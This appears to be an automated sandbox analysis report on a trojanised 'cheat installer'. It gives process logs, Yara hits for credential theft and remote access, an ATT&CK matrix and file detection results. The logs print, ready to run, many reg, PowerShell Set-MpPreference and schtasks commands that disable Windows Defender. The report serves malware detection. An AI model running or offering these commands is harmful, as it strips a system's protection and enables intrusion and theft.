            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\opensource\cheatinstaller 2.32\install\e957a1c\yttstcheat.msi" /quiet ai_setupexepath=c:\users\user\appdata\local\temp\7zs8c89.tmp\install_yttchts.exe setupexedir=c:\users\user\appdata\local\temp\7zs8c89.tmp\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1711662176 " allusers="1"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pssc38a.ps1" -propfile "c:\users\user\appdata\local\temp\msic368.txt" -scriptfile "c:\users\user\appdata\local\temp\scrc369.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scrc36a.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\opensource\cheatinstaller 2.32\install\e957a1c\yttstcheat.msi" /quiet ai_setupexepath=c:\users\user\appdata\local\temp\7zs8c89.tmp\install_yttchts.exe setupexedir=c:\users\user\appdata\local\temp\7zs8c89.tmp\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1711662176 " allusers="1"
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeQueries volume information: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000037.00000002.1817217674.0000000004B32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000037.00000002.1926718399.0000000006FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000037.00000002.1879276919.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000037.00000002.1879276919.0000000006141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000076.00000002.2720062621.00000000060A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000078.00000002.2493789201.000001B2394C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000037.00000002.1817217674.0000000004B32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000037.00000002.1926718399.0000000006FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000037.00000002.1879276919.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000037.00000002.1879276919.0000000006141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000076.00000002.2720062621.00000000060A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000078.00000002.2493789201.000001B2394C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            1
            Replication Through Removable Media
            2
            Windows Management Instrumentation
            1
            Scripting
            1
            DLL Side-Loading
            211
            Disable or Modify Tools
            OS Credential Dumping11
            Peripheral Device Discovery
            Remote ServicesData from Local System2
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts11
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            11
            Process Injection
            1
            DLL Side-Loading
            LSASS Memory2
            File and Directory Discovery
            Remote Desktop ProtocolData from Removable Media1
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Scheduled Task/Job
            11
            Scheduled Task/Job
            11
            Scheduled Task/Job
            1
            File Deletion
            Security Account Manager43
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            PowerShell
            Login HookLogin Hook122
            Masquerading
            NTDS1
            Query Registry
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Modify Registry
            LSA Secrets23
            Security Software Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts171
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Process Injection
            DCSync171
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            Remote System Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Network Configuration Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            JWQgbclQK570%ReversingLabsWin32.Trojan.Casdet
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\color-support\bin.js0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\cssesc\bin\cssesc0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\esm\bin.d.mts0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\glob\dist\esm\bin.mjs0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\mkdirp\bin\cmd.js0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\bin\node-gyp.js0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\gyp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\gyp_main.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\common.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\common_test.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\easy_xml.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\easy_xml_test.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\flock_tool.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\generator\analyzer.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\generator\android.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\generator\cmake.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\generator\compile_commands_json.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\generator\dump_dependency_json.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\gyp\pylib\gyp\generator\eclipse.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\glob\dist\cjs\src\bin.js0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\node_modules\nopt\bin\nopt.js0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\node_modules\which\bin\node-which0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\test\fixtures\test-charmap.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\node-gyp\update-gyp.py0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\nopt\bin\nopt.js0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\pacote\lib\bin.js0%ReversingLabs
